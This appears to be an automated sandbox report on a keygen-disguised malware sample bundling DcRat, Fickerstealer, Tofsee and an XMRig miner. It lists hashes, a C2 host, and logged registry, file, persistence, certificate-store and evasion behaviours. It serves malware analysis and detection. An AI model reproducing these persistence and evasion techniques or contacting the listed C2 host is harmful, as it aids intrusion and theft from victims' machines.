dcrat | b2718252be051e7fbc18b319b31ef746d88407272473a465b673cea0de3c4aad

Target

keygen-step-4 — копия.exe
Size

4.6MB
MD5

563107b1df2a00f4ec868acd9e08a205
SHA1

9cb9c91d66292f5317aa50d92e38834861e9c9b7
SHA256

bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9
SHA512

99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Score

10^/10

dcrat fickerstealer tofsee xmrig discovery evasion infostealer miner persistence rat trojan

Malware Config

Extracted

Family

fickerstealer

sodaandcoke.top:80

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
fickerstealer
Ficker is an infostealer written in Rust and ASM.
infostealer fickerstealer
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

XMRig Miner Payload 2 IoCs

miner

resource	yara_rule
behavioral7/memory/5152-290-0x00000001402CA898-mapping.dmp	xmrig
behavioral7/memory/5152-283-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe

Executes dropped EXE 14 IoCs

pid	Process
1460	xiuhuali.exe
2684	JoSetp.exe
2632	Install.exe
3712	Install.tmp
3776	Ultra.exe
2060	ultramediaburner.exe
4148	ultramediaburner.tmp
4224	UltraMediaBurner.exe
4260	Bahykaejewi.exe
4320	Daezholypuda.exe
4440	filee.exe
4400	Conhost.exe
4304	6DE2.tmp.exe
4920	7016.tmp.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Bahykaejewi.exe

Loads dropped DLL 2 IoCs

pid	Process
2664	rundll32.exe
3712	Install.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2544	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Taemanyheta.exe\""	Ultra.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
33	ip-api.com
97	api.ipify.org
199	api.myip.com
200	api.myip.com
263	api.2ip.ua
265	api.2ip.ua

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\IPR2NN0X.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\IPR2NN0X.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3216 set thread context of 196	3216	svchost.exe	78

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\UltraMediaBurner\is-390E1.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\Windows Portable Devices\Taemanyheta.exe.config	Ultra.exe
File created	C:\Program Files\install.dat	xiuhuali.exe
File created	C:\Program Files\install.dll	xiuhuali.exe
File created	C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe	Ultra.exe
File created	C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe.config	Ultra.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-4ITOH.tmp	ultramediaburner.tmp
File created	C:\Program Files\libEGL.dll	xiuhuali.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\Windows Portable Devices\Taemanyheta.exe	Ultra.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral7/files/0x000100000001ac83-324.dat	nsis_installer_2
behavioral7/files/0x000100000001ac83-323.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
3200	timeout.exe
684	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2840	bitsadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2308	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K}	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K}\1 = "4164"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000001bd620527348f444750ddeed7c6a645a4b4fb6dcd7ac01c540708c2904921522c2e8ad0a78b039cc47f5c7ffbc33d7970293b7961d3240a8cc377010fbf4	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TV2553ZI-PZ3Y-VP7M-68Y0-MJT9X67Z6U7M}	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000973dc56bff01f8d9f110c05868d0b62c8fcd957a23229fc35c40c060a89115b0be999b5f848d6703298e192051f853145c7678f25ec8c61f366ead1d95a7c1b2937684980c96e3ca979481d5cdc8d1d1e387dbf95d9114cd1e91	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompletedV = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	filee.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8